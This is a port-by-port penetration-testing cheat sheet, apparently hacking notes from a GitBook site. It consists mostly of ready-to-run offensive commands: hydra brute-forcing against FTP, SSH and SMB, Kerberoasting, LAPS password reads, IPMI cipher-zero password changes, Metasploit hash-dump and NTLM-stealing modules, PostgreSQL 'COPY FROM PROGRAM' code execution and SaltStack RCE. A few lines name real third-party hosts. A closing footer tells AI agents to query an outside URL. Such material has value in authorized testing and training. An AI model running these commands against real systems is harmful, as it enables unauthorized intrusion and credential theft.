# Ports & Enumeration FTP / Port 21: ``` ftp -a IP ftp ftp://USER:PASS@IP hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt -e nsr -s 21 ftp://URL ``` SSH / Port 22: ``` hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt -e nsr -s 22 SSH://URL ``` Telnet / Port 23: ``` nc -vv IP PORT ``` STMP/ port 25: ``` nc -vv IP 25 echo EHLO RCPT TO: brian@Fake.com MAIL FROM: client@client.com data pwned . swaks -n -hr -f chris@example.org -t blah@nintendo.com -s smtpgw1.nintendo.com:25 ``` DNS / Port 53: ``` host -t axfr URL dnsrecon -d URL -t axfr dnsenum URL ``` TFTP/port 69: ``` nmap -n -Pn -sU -p69 -sV --script tftp-enum ``` HTTP/s port 80/8080/8000/443/8443: ``` nikto -host URL:PORT -C all feroxbuster -u URL:PORT -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o OUTPUT.txt gobuster dir -u URL:PORT -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt wpscan --url URL:PORT --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive whatweb --color=never --no-errors -a 3 -v URL:PORT wkhtmltoimage --format png URL:PORT OUTPUT.png curl -sSikf URL:PORT/robots.txt ``` Kerberos/ port 88: ``` crackmapexec ldap IP --kerberoast ``` POP3/ port 111/ 995: ``` USER username PASS password LIST RETR 1 ``` IDENT/ port 113: ``` apt install ident-user-enum ident-user-enum IP PORT-TO-QUERY ident-user-enum IP 22 100000 ``` RPC/ port 135: ``` rpcmap -U '' IP rsysinfo 192.168.10.1 nmap -sSUC -p111 192.168.10.1 rusers -l 192.168.10.1 ``` SMB/ port 137-139/445: ``` smbmap -H IP smbclient '\\IP\' -L smbclient '\\IP\SHARE' crackmapexec smb IP --shares hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt -e nsr -s 445 SMB://URL ``` SNMP / Port 161: ``` snmp-check IP snmpwalk -v 1 -c public 192.168.0.42 snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25 .1.3.6.1.2.1.1.5 Hostname .1.3.6.1.4.1.77.1.4.2 Domain name .1.3.6.1.4.1.77.1.2.25 Usernames .1.3.6.1.4.1.77.1.2.3.1.1 Running services .1.3.6.1.4.1.77.1.2.27 Share information ``` LDAP/ Port 389/636: ``` ldapsearch -x -h IP -D '' -w '' -b "DC=DOMAIN,DC=DOMAIN" | grep sAMAccountName: ldapsearch -v -x -D USER@DOMAIN -w PASSWD -b "DC=DOMAIN,DC=DOMAIN" -h IP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd GetADUsers.py DOMAIN/ -dc-ip IP -all | awk '{print $1}' | tee users.txt GetNPUsers.py DOMAIN/ -dc-ip IP -usersfile users.txt GetUserSPNs.py DOMAIN/ -dc-ip IP GetUserSPNs.py hutch.offsec/ -dc-ip 192.168.76.122 -usersfile users.txt -request Get-GPPPassword.py USER:PASS@IP ``` HTTPs / Port 443+: ```bash #Tls Extensions openssl s_client -tlsextdebug -connect www.google.com:443 # ssl resumption sslyze --resum www.163.com:443 # ssl renegotiation sslyze --reneg www.ibm.com:443 # cert info openssl s_client -connect www.google.com:443 # compression sslyze --compression www.google.com:443 # tls fallback openssl s_client -connect www.example.com:443 -no_tls1_2 -fallback_scsv # known ssl key nmap -p443 --script ssl-known-key 192.168.0.15 ``` Apple Filling Protocol (AFP) / Port 548: 
#Nmap scripts: 
# Lists available AFP volumes and files
afp-ls 
# Lists all AFP volumes and files
afp-path-vuln 
# Displays AFP server information
afp-serverinfo 
afp-showmount
IPMI / Port 623 (UDP): ```bash use auxiliary/scanner/ipmi/ipmi_version use auxiliary/scanner/ipmi/ipmi_dumphashes use auxiliary/scanner/ipmi/ipmi_cipher_zero ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 ``` Rsync / Port 873: ``` docker run -t ullaakut/cameradar docker run -t ullaakut/cameradar -t 80.169.239.143 -p 554 ``` Rsync / Port 873: ``` rsync -rdt rsync://IP:PORT rsync -av USER@IP::FOLDER/ . ``` MsSQL / Port 1433: ```bash git clone https://github.com/NetSPI/PowerUpSQL import-module ./powerupsql.ps1 $user = "publicuser" $pass = "GuestUserCantWrite1" $i = "10.10.11.202,1433" Invoke-SQLAudit -verbose -instance $i -username $user -password $pass # Enumerate server configuration mssql_enum # Local privilege escalation mssql_escalate_dbowner mssql_escalate_execute_as # Crawl available databases for useful content mssql_findandsampledata # Extract encrypted user password hashes mssql_hashdump # Search the database for interesting data mssql_idf # Add privileged local user accounts mssql_local_auth_bypass # Exploit linked database servers mssql_linkcrawler # Steal NTLM service credentials via SMB mssql_ntlm_stealer # Execute OS commands via xp_cmdshell mssql_payload # Extract the database schema mssql_schemadump # Load and execute SQL statements from a file mssql_sql_file ``` Oracle Transparent Network Substrate (TNS) / Port 1521: ```bash # Get versioning tnscmd10g version -h 10.11.21.25 # useful commands: # Ping the listener ping # Provide output of the listener version and platform information version # Return the current status and variables used by the listener status # Dump service data services # Dump debugging information to the listener log debug # Reload the listener configuration file reload # Write the listener configuration file to a backup location save_config # Invoke listener shutdown stop # Meterpreter: use auxiliary/scanner/oracle/sid_enum use auxiliary/scanner/oracle/sid_brute nmap -p1521 --script oracle-brute --script-args oracle-brute.sid=TEST nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30 # authenticate: # download and save /opt/oracle/instantclient-basic-linux-XXXX.zip /opt/oracle/instantclient-sqlplus-linux-XXXX.zip export PATH=$PATH:/opt/oracle/instantclient_12_1 export SQLPATH=/opt/oracle/instantclient_12_1 export TNS_ADMIN=/opt/oracle/instantclient_12_1 export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1 export ORACLE_HOME=/opt/oracle/instantclient_12_1 # login sqlplus perfstat/perfstat@10.11.21.20:1521/TEST ``` NFS / port 2049: ``` Showmout -e IP Mount -t nfs -o vers=2 -o nolock IP:/home /nfs ``` iSCSI / Port 3260: ```bash nmap –p3260 --script iscsi-brute 192.168.56.5 ``` MySQL / Port 3306: ```bash # brute login use auxiliary/scanner/mysql/mysql_login # Return the basic configuration and server settings mysql_enum #Extract username and password hash values mysql_hashdump # mysql_start_up Execute OS commands (Windows) mysql_payload # Display the database schema mysql_schemadump # Execute arbitrary SQL statements mysql_sql ``` ZeroMQ ZMTP / port 4505/4506: ``` msfconsole: linux/misc/saltstack_salt_unauth_rce ``` SIP/ Port 5060: ```bash smap -o PBX # enum potential hosts svmap.py 192.168.1.1/24 # user enum svwar.py -e100-300 PBX-IP -m INVITE # sniff traffic and output a pcap sidump auth.txt -p auth.pcap # crack the hashes sipcrack auth.txt -w wordlist.txt # nmap and grab mac address the capture call (will output in wav format) ucsniff -i eth9 -T # Metersploit use auxiliary/sip_invite_spoof ``` PostGresql / Port 5432: ```bash # brute user use auxiliary/scanner/postgres/postgres_login # login psql -h IP -U USER # list databases \list #connect to database \c DATABASE # list tables \dt SELECT usename, passwd FROM pg_shadow; pg_dump --host=IP --username=USER --password --dbname=DB --table='TABLE' -f output_pgdump ## Code Execution CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM ‘CODE’; SELECT * FROM cmd_exec; # Meterpreter # Execute arbitrary SQL statements postgres_sql # Extract username and password hash values postgres_hashdump # Display the database schema postgres_schemadump # Import a local file and display it (e.g., /etc/passwd) postgres_readfile # Load a shared object via pg_largeobject and create a UDF to execute arbitrary code on the server side postgres_payload ``` Redis / Port 6379: ```bash # auth redis-cli -h 109.206.167.35 # get keys keys * ``` WSUS/ port 8530 & 8531: ``` SharpWSUS pyWSUS ``` Memcache/ port 11211: ```bash echo "version" | nc -vn -w 1 11211 #Get version echo "stats" | nc -vn -w 1 11211 #Get status echo "stats slabs" | nc -vn -w 1 11211 #Get slabs echo "stats items" | nc -vn -w 1 11211 #Get items of slabs with info echo "stats cachedump 0" | nc -vn -w 1 11211 #Get key names (the 0 is for unlimited output size) echo "get " | nc -vn -w 1 11211 #Get saved info # meterpreter: use auxiliary/gather/memcached_extractor ``` MongoDB / Port 27017: ``` mongo mongodb://USER:PASS@IP:PORT/ show dbs use DB show tables db.TABLE.find() ``` gRPC / Port 50051: ``` https://github.com/fullstorydev/grpcui https://github.com/fullstorydev/grpcurl ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://f1rstbyt3.gitbook.io/hacking-notes/ports-and-enumeration.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.